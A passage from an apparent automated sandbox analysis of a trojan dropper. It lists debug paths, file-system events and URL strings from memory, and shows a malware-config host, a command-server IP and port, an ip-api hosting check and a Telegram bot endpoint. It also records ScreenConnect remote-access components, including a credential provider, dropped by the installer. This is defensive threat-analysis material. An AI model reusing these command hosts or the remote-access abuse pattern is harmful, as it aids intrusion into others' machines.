                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000010.00000000.1290146528.0000000000D72000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.WindowsClient.exe.4.dr
                        Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: 4e450e.msi.4.dr, MSI41FF.tmp.3.dr, 4e450c.msi.4.dr, ex.msi.0.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1345010311.000000001B032000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.4.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.4.dr
                        Source: Binary string: System.ni.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: d:
                        Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: c:
                        Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                        Networking

                        barindex
                        Source: Malware configuration extractorURLs: 127.0.0.1
                        Source: Malware configuration extractorURLs: beshomandotestbesnd.run.place
                        Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                        Source: global trafficTCP traffic: 192.168.2.6:49688 -> 103.195.101.204:8041
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewASN Name: RELIABLESITEUS RELIABLESITEUS
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: mail.cloudhelpdesk.cloud
                        Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: svchost.exe, 00000011.00000002.2475208265.000002B561400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000010.00000002.2484633040.000000001328E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: ScreenConnect.WindowsAuthenticationPackage.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: svchost.exe, 00000011.00000002.2475254375.000002B561413000.00000004.00000020.00020000.00000000.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.17.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                        Source: svchost.exe, 00000011.00000002.2475340058.000002B56144A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1323106947.000002B561449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?cc31cda
                        Source: svchost.exe, 00000011.00000002.2474255889.000002B560479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws
                        Source: svchost.exe, 00000011.00000002.2475021662.000002B560D00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                        Source: svchost.exe, 00000011.00000003.1321774469.000002B560D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdns:sam
                        Source: svchost.exe, 00000011.00000003.1323106947.000002B561449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                        Source: svchost.exe, 00000011.00000003.1321774469.000002B560D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsddre
                        Source: svchost.exe, 00000011.00000003.1321774469.000002B560D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdoft.c
                        Source: svchost.exe, 00000011.00000003.1321774469.000002B560D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpSe
                        Source: svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#S
                        Source: svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
                        Source: svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDfG
                        Source: XClient.exe, 00000002.00000002.1335713833.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000002.1335713833.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000002.1335713833.0000000002D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000002.1335713833.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp, XClient.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000010.00000002.2484633040.000000001328E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: svchost.exe, 00000011.00000002.2474584572.000002B5604B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                        Source: svchost.exe, 00000011.00000002.2475021662.000002B560D00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                        Source: svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/
                        Source: svchost.exe, 00000011.00000002.2475063659.000002B560D37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: svchost.exe, 00000011.00000002.2475063659.000002B560D37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2475041602.000002B560D13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                        Source: svchost.exe, 00000011.00000002.2475147231.000002B560D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy=80600
                        Source: svchost.exe, 00000011.00000002.2475123863.000002B560D5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2475063659.000002B560D37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2475041602.000002B560D13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                        Source: svchost.exe, 00000011.00000002.2475123863.000002B560D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scicyrf
                        Source: svchost.exe, 00000011.00000002.2475123863.000002B560D5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2475063659.000002B560D37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2475041602.000002B560D13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                        Source: svchost.exe, 00000011.00000002.2475147231.000002B560D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                        Source: svchost.exe, 00000011.00000002.2475147231.000002B560D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                        Source: svchost.exe, 00000011.00000002.2475147231.000002B560D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                        Source: svchost.exe, 00000011.00000002.2475063659.000002B560D37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustnce
                        Source: XClient.exe, 00000002.00000002.1335713833.0000000002D2C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.2477076184.0000000001BBA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1340922647.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Amcache.hve.14.drString found in binary or memory: http://upx.sf.net
                        Source: rundll32.exe, 00000006.00000003.1251452306.0000000004A43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1251273476.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1251273476.0000000004BBE000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.6.dr, Microsoft.Deployment.Compression.Cab.dll.6.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                        Source: rundll32.exe, 00000006.00000003.1251452306.0000000004A43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1251273476.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1251273476.0000000004BBE000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.6.dr, Microsoft.Deployment.Compression.Cab.dll.6.drString found in binary or memory: http://wixtoolset.org/news/
                        Source: rundll32.exe, 00000006.00000003.1251452306.0000000004A43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1251273476.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1251273476.0000000004BBE000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.6.dr, Microsoft.Deployment.Compression.Cab.dll.6.drString found in binary or memory: http://wixtoolset.org/releases/
                        Source: svchost.exe, 0000000A.00000002.1386208187.0000025C08A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                        Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000010.00000002.2484633040.000000001328E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                        Source: svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inli
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302834084.000002B560D2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605
                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                        Source: svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                        Source: svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                        Source: svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1303457308.000002B560D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302834084.000002B560D2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302196987.000002B560D57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp, XClient.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                        Source: svchost.exe, 0000000A.00000003.1385706569.0000025C08A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                        Source: svchost.exe, 0000000A.00000002.1386317275.0000025C08A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1385706569.0000025C08A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                        Source: svchost.exe, 0000000A.00000003.1385756682.0000025C08A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1385602822.0000025C08A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1385706569.0000025C08A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1385739803.0000025C08A5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386365146.0000025C08A63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1385514388.0000025C08A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386420546.0000025C08A70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386291943.0000025C08A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                        Source: svchost.exe, 0000000A.00000003.1385514388.0000025C08A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386420546.0000025C08A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                        Source: svchost.exe, 0000000A.00000003.1385706569.0000025C08A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                        Source: svchost.exe, 0000000A.00000002.1386394140.0000025C08A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                        Source: svchost.exe, 0000000A.00000002.1386444451.0000025C08A77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1385471549.0000025C08A75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                        Source: svchost.exe, 0000000A.00000003.1385706569.0000025C08A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
